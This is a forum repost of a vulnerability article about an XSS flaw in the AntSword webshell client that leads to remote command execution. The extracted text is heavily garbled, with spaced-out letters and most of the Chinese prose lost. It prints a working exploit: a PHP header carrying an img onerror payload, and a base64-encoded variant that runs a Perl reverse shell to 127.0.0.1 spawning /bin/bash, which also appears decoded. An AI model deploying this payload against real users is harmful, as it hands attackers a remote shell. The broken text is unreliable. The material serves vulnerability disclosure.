搜索

[13979] 2019-04-12_中国蚁剑被曝XSS漏洞,可导致远程命令执行

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2019-04-12_中国蚁剑被曝XSS漏洞,可导致远程命令执行 X S S A l l e n b b   F r e e B u f   2 0 1 9 - 0 4 - 1 2 4 1 2 G i t H u b i s s u e X S S R C E w e b s h e l l 使 使 h t m l x s s w e b s h e l l   X S S     j s     p e r l   便 s h e l l
s h e l l e x p   ( f o r   p e r l ) 使 b a s e 6 4 b a s e 6 4 _ d e c o d e   c o d e s h e l l   A n t S w o r d   v 2 . 0 . 7 . 1 < ? p h p h e a d e r ( ' H T T P / 1 . 1   5 0 0   < i m g   s r c = #   o n e r r o r = a l e r t ( 1 ) > ' ) ; < ? p h p h e a d e r ( " H T T P / 1 . 1   4 0 6   N o t   < i m g   s r c = #   o n e r r o r = ' e v a l ( n e w   B u f f e r ( ` c m V x d W l y Z S g n Y 2 h p b G R f c H J v Y 2 V z c y c p L m V 4 Z W M o J 3 B l c m w g L W U g X C d 1 c 2 U g U 2 9 j a 2 V 0 O y R p P S I x M j c u M C 4 w L j E i O y R w P T E w M D I 7 c 2 9 j a 2 V 0 K F M s U E Z f S U 5 F V C x T T 0 N L X 1 N U U k V B T S x n Z X R w c m 9 0 b 2 J 5 b m F t Z S g i d G N w I i k p O 2 l m K G N v b m 5 l Y 3 Q o U y x z b 2 N r Y W R k c l 9 p b i g k c C x p b m V 0 X 2 F 0 b 2 4 o J G k p K S k p e 2 9 w Z W 4 o U 1 R E S U 4 s I j 4 m U y I p O 2 9 w Z W 4 o U 1 R E T 1 V U L C I + J l M i K T t v c G V u K F N U R E V S U i w i P i Z T I i k 7 Z X h l Y y g i L 2 J p b i 9 i Y X N o I C 1 p I i k 7 f T t c J y c s K G V y c m 9 y L C B z d G R v d X Q s I H N 0 Z G V y c i k 9 P n s K I C A g I G F s Z X J 0 K G B z d G R v d X Q 6 I C R 7 c 3 R k b 3 V 0 f W A p O w o g I H 0 p O w = = ` , ` b a s e 6 4 ` ) . t o S t r i n g ( ) ) ' > " ) ; ? > r e q u i r e ( ' c h i l d _ p r o c e s s ' ) . e x e c ( ' p e r l   - e   ' u s e   S o c k e t ; $ i = " 1 2 7 . 0 . 0 . 1 " ; $ p = 1 0 0 2 ; s o c k e t ( S , P F _ I N E T , S O C K _ S T R E A M , g e t p r o t o b y n a m e ( " t c p " ) ) ; i f ( c o n n e c t ( S , s o c k a d d r _ i n ( $ p , i n e t _ a t o n ( $ i ) ) ) ) { o p e n ( S T D I N , " > & S " ) ; o p e n ( S T D O U T , " > & S " ) ; o p e n ( S T D E R R , " > & S " ) ; e x e c ( " / b i n / b a s h   - i " ) ; } ; ' ' , ( e r r o r ,   s t d o u t ,   s t d e r r ) = > {         a l e r t ( ` s t d o u t :   $ { s t d o u t } ` ) ;     } ) ;
  t o a s t r   ,     t o a s t r     h t m l     h t m l 使 1 . h t t p s : / / g i t h u b . c o m / A n t S w o r d P r o j e c t / a n t S w o r d / i s s u e s / 1 4 7 2 . h t t p s : / / w w w . j i a n s h u . c o m / p / 6 4 5 7 e 8 b 4 a 1 6 b * A l l e n b b F r e e B u f . C O M

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理